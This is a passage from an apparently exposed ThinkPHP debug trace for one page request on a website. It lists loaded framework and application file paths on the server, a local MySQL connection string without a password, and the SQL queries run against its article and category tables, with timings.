  82. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/CacheHandlerInterface.php ( 1.99 KB )
  83. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/Request.php ( 0.09 KB )
  84. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Request.php ( 55.78 KB )
  85. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/middleware.php ( 0.25 KB )
  86. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Pipeline.php ( 2.61 KB )
  87. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/TraceDebug.php ( 3.40 KB )
  88. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/middleware/SessionInit.php ( 1.94 KB )
  89. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Session.php ( 1.80 KB )
  90. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/session/driver/File.php ( 6.27 KB )
  91. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/SessionHandlerInterface.php ( 0.87 KB )
  92. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/session/Store.php ( 7.12 KB )
  93. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Route.php ( 23.73 KB )
  94. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleName.php ( 5.75 KB )
  95. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Domain.php ( 2.53 KB )
  96. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleGroup.php ( 22.43 KB )
  97. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Rule.php ( 26.95 KB )
  98. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleItem.php ( 9.78 KB )
  99. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/route/app.php ( 1.72 KB )
  100. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/Route.php ( 4.70 KB )
  101. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/dispatch/Controller.php ( 4.74 KB )
  102. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Dispatch.php ( 10.44 KB )
  103. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/controller/Index.php ( 4.81 KB )
  104. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/BaseController.php ( 2.05 KB )
  105. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/facade/Db.php ( 0.93 KB )
  106. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/connector/Mysql.php ( 5.44 KB )
  107. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/PDOConnection.php ( 52.47 KB )
  108. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Connection.php ( 8.39 KB )
  109. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/ConnectionInterface.php ( 4.57 KB )
  110. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/builder/Mysql.php ( 16.58 KB )
  111. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Builder.php ( 24.06 KB )
  112. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseBuilder.php ( 27.50 KB )
  113. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Query.php ( 15.71 KB )
  114. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseQuery.php ( 45.13 KB )
  115. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TimeFieldQuery.php ( 7.43 KB )
  116. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/AggregateQuery.php ( 3.26 KB )
  117. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ModelRelationQuery.php ( 20.07 KB )
  118. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ParamsBind.php ( 3.66 KB )
  119. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ResultOperation.php ( 7.01 KB )
  120. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/WhereQuery.php ( 19.37 KB )
  121. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/JoinAndViewQuery.php ( 7.11 KB )
  122. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TableFieldInfo.php ( 2.63 KB )
  123. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/Transaction.php ( 2.77 KB )
  124. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/driver/File.php ( 5.96 KB )
  125. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/LogHandlerInterface.php ( 0.86 KB )
  126. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/Channel.php ( 3.89 KB )
  127. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/event/LogRecord.php ( 1.02 KB )
  128. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/Collection.php ( 16.47 KB )
  129. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/View.php ( 1.70 KB )
  130. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/View.php ( 4.39 KB )
  131. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Response.php ( 8.81 KB )
  132. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/response/View.php ( 3.29 KB )
  133. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Cookie.php ( 6.06 KB )
  134. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-view/src/Think.php ( 8.38 KB )
  135. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/TemplateHandlerInterface.php ( 1.60 KB )
  136. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/Template.php ( 46.61 KB )
  137. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/driver/File.php ( 2.41 KB )
  138. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/contract/DriverInterface.php ( 0.86 KB )
  139. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/runtime/temp/067d451b9a0c665040f3f1bdd3293d68.php ( 11.98 KB )
  140. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/Html.php ( 4.42 KB )
  1. CONNECT:[ UseTime:0.000468s ] mysql:host=127.0.0.1;port=3306;dbname=f_mffb;charset=utf8mb4
  2. SHOW FULL COLUMNS FROM `fenlei` [ RunTime:0.000705s ]
  3. SELECT * FROM `fenlei` WHERE `fid` = 0 [ RunTime:0.006555s ]
  4. SELECT * FROM `fenlei` WHERE `fid` = 63 [ RunTime:0.000287s ]
  5. SHOW FULL COLUMNS FROM `set` [ RunTime:0.000502s ]
  6. SELECT * FROM `set` [ RunTime:0.000196s ]
  7. SHOW FULL COLUMNS FROM `article` [ RunTime:0.000543s ]
  8. SELECT * FROM `article` WHERE `id` = 474922 LIMIT 1 [ RunTime:0.000708s ]
  9. UPDATE `article` SET `lasttime` = 1770781147 WHERE `id` = 474922 [ RunTime:0.022015s ]
  10. SELECT * FROM `fenlei` WHERE `id` = 67 LIMIT 1 [ RunTime:0.000358s ]
  11. SELECT * FROM `article` WHERE `id` < 474922 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000540s ]
  12. SELECT * FROM `article` WHERE `id` > 474922 ORDER BY `id` ASC LIMIT 1 [ RunTime:0.000395s ]
  13. SELECT * FROM `article` WHERE `id` < 474922 ORDER BY `id` DESC LIMIT 10 [ RunTime:0.001932s ]
  14. SELECT * FROM `article` WHERE `id` < 474922 ORDER BY `id` DESC LIMIT 10,10 [ RunTime:0.001097s ]
  15. SELECT * FROM `article` WHERE `id` < 474922 ORDER BY `id` DESC LIMIT 20,10 [ RunTime:0.000883s ]
0.119234s